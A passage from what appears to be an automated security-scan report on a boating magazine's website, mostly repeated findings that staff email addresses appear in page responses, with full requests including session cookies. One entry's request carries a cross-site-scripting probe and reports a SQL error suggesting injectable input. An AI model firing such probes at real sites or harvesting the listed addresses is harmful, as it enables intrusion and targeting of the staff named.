<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.210. http://www.soundingsonline.com/features/profiles

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/profiles

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /features/profiles HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.211. http://www.soundingsonline.com/features/technical

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/technical

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /features/technical HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.212. http://www.soundingsonline.com/features/type-of-boat

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/type-of-boat

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /features/type-of-boat HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.213. http://www.soundingsonline.com/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.214. http://www.soundingsonline.com/more/digital-publications

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/digital-publications

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /more/digital-publications HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.215. http://www.soundingsonline.com/more/the-masters-series

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/the-masters-series

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
c.brayfield@soundingspub.com
info@soundingspub.com

Request

GET /more/the-masters-series HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:c.brayfield@soundingspub.com">c.brayfield@soundingspub.com</a>
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.216. http://www.soundingsonline.com/news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /news HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.217. http://www.soundingsonline.com/news/coastwise

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/coastwise

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /news/coastwise HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.218. http://www.soundingsonline.com/news/dispatches

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/dispatches

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news/dispatches HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.219. http://www.soundingsonline.com/news/home-waters

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/home-waters

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news/home-waters HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.220. http://www.soundingsonline.com/news/mishaps-a-rescues

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news/mishaps-a-rescues HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.221. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The following email addresses were disclosed in the response. Note that this request carried an XSS probe in the query string and the response body opens with a verbose MySQL error ("SQL/DB Error -- You have an error in your SQL syntax"), which indicates that the probe string reached a database query unescaped; that error-message disclosure is a separate, higher-severity finding than the e-mail disclosure recorded in this entry and deserves its own follow-up.

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 15:00:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 15:00:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.222. http://www.soundingsonline.com/news/mishaps-a-rescues/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/index.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news/mishaps-a-rescues/index.php HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.223. http://www.soundingsonline.com/news/sailing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/sailing

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news/sailing HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.224. http://www.soundingsonline.com/news/todays-top-stories

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/todays-top-stories

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news/todays-top-stories HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.225. http://www.soundingsonline.com/resources

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /resources

Issue detail

The following email addresses were disclosed in the response:

Request

GET /resources HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.226. http://www.soundingsonline.com/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /s_code.js HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Content-Length: 34160
Content-Type: application/x-javascript
Last-Modified: Tue, 25 Jan 2011 16:00:37 GMT
Accept-Ranges: bytes
ETag: "1c1772a9bccb1:2b20"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 17:18:11 GMT
Connection: close

/*
SiteCatalyst: H.21.1.
kevin.rogers@dominionenterprises.com
01.25.2011
*/

function switchSuite() {
   var suiteList= "";
       if (location.hostname.indexOf('mobile')!=-1) {
           suiteList += "desoundings,desoundingsmobile";
       } else {    
           suiteList += "deso
...[SNIP]...

21.227. http://www.soundingsonline.com/site-map

